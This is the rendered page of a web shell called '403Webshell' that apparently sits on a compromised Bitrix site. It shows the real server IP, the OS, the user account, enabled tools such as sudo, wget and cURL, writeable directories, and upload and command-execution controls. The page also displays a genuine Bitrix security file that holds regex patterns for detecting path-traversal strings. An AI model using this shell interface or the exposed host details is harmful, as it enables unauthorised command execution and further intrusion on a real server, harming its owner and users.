403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/security/lib/filter/auditor/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/security/lib/filter/auditor/path.php
<?php
/**
 * Bitrix Security Module
 * @package Bitrix
 * @subpackage Security
 * @copyright 2001-2013 Bitrix
 * @since File available since 14.0.0
 */
namespace Bitrix\Security\Filter\Auditor;

/**
 * Path security auditor
 * Searching "path traversal" like strings, for example: /foo/../bar/
 *
 * @package Bitrix\Security\Filter\Auditor
 * @since 14.0.0
 */
class Path
	extends Base
{
	protected $name = 'PHP';

	protected function getFilters()
	{
		$filters = array();
		$filters['#((?:[\\\/]|%2f|%5c)(?:\.|%2e))((?:\.|%2e)(?:[\\\/]|%2f|%5c))#is'] = $this->getSplittingString(2);
		if(
			(!defined('PHP_OS'))
			|| (mb_strtoupper(mb_substr(PHP_OS, 0, 3)) === 'WIN')
		)
		{
			$slashes = '\\\/\x20\x22\x3c\x3e\x5c';
		}
		else
		{
			$slashes = '\\\/';
		}

		$filters['#(?:\.['.$slashes.']+){30,}#'] = ' X ';

		$result = array(
			'search' => array_keys($filters),
			'replace' => $filters
			);
		return $result;
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit